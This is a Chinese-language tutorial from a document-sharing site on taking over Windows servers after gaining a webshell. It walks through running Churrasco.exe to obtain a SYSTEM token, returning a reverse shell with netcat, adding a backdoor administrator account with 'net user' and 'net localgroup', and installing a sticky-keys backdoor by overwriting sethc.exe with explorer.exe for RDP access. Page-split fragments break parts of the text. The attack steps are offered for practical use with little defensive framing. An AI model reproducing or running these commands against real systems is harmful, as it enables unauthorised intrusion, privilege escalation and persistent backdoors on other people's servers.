利用SHIFT后门拿服务器的方法

上传人:工**** 文档编号:507721530 上传时间:2023-09-07 格式:DOCX 页数:4 大小:13.93KB
返回 下载 相关 举报
利用SHIFT后门拿服务器的方法_第1页
第1页 / 共4页
利用SHIFT后门拿服务器的方法_第2页
第2页 / 共4页
利用SHIFT后门拿服务器的方法_第3页
第3页 / 共4页
利用SHIFT后门拿服务器的方法_第4页
第4页 / 共4页
亲,该文档总共4页,全部预览完了,如果喜欢就下载吧!
资源描述

《利用SHIFT后门拿服务器的方法》由会员分享,可在线阅读,更多相关《利用SHIFT后门拿服务器的方法(4页珍藏版)》请在金锄头文库上搜索。

1、文档供参考,可复制、编制,期待您的好评与关注! 利用SHIft后门拿只有想不到的服务没有做不到的器方法那么在这里我写点自己提权时所用到几个小方法!也是自己实战得来的经验!方法如有不对的请大家多多指点!提权时要到的工具如下:cmd.exe Churrasco.exe nc.exe以上就是今天主要讲的!东西是死的!人是活的!就看你怎么用了!用以上工具先要确定SHELL里 wscript.shell 命令行执行组件是否可用!如不能用用以下方法进行调用!如调用也不行!那么就请你另想办法!代码如下 : 将以上代码保存为cmd.asp上传到SHELL里 再访问这个CMD.asp如没有出错等就说明可以执行C

2、MD命令!下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功 原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功 但出现 /churrasco/-Current User: NETWORK SERVICE/churrasco/-Getting Rpcss PID ./churrasco/-Found Rpcss PID: 696/churrasco/-Searching for Rpcss threads ./churrasco/-Found Threa

3、d: 444/churrasco/-Thread not impersonating, looking for another thread./churrasco/-Found Thread: 700/churrasco/-Thread not impersonating, looking for another thread./churrasco/-Found Thread: 704/churrasco/-Thread not impersonating, looking for another thread./churrasco/-Found Thread: 712/churrasco/-

4、Thread impersonating, got NETWORK SERVICE Token: 0xf24/churrasco/-Getting SYSTEM token from Rpcss Service./churrasco/-Found szywjs Token/churrasco/-Found SYSTEM token 0xf1c/churrasco/-Running command with SYSTEM Token.直到这里 没有出现命令执行成功 那么这时你千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我

5、就不用说了!如果说权限很小的这里你也有很大的希望了!在反弹回来的CMDSHELL里执行 C:RECYCLERChurrasco.exe net user iisuser iisuser /add”C:RECYCLERChurrasco.exe net localgroup administrators iisuser /addC:RECYCLERChurrasco.exe 这里是你所传到的目录!这样可以说90%的出现命令执行成功!这样就可以进行3389连接了!如果说这时没有出现命令执行成功 下面我就再告诉你一种方法!如下 依次执行:attrib c:windowssystem32sethc.e

6、xe -h -r -sattrib c:windowssystem32dllcachesethc.exe -h -r -sdel c:windowssystem32sethc.execopy c:windowsexplorer.exe c:windowssystem32sethc.execopy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exeattrib c:windowssystem32sethc.exe +h +r +sattrib c:windowssystem32dllcachesethc.exe +h +r

7、+s如果出现拒绝等错误 那就没法了!如果说这台服务器先是被别人拿过了做了shift后门 那么就是100%成功!本人亲自用这方法成功替换过别人带有密码的SHIFT后门!还有一点就是在webSHELL里或CMDSHELL下也可以这样执行!C:RECYCLERChurrasco.exe copy d:windowsexplorer.exe d:windowssystem32sethc.exeC:RECYCLERChurrasco.exe copy d:windowssystem32sethc.exe d:windowssystem32dllcachesethc.exe 还有就是attrib 加属性等也可以这样执行!还有一点忘了就是在反弹回来的CMDSHELL里用这种方法也可以!这样就可以利用SHIft后门成功拿下服务器了。 /

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 行业资料 > 国内外标准规范

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号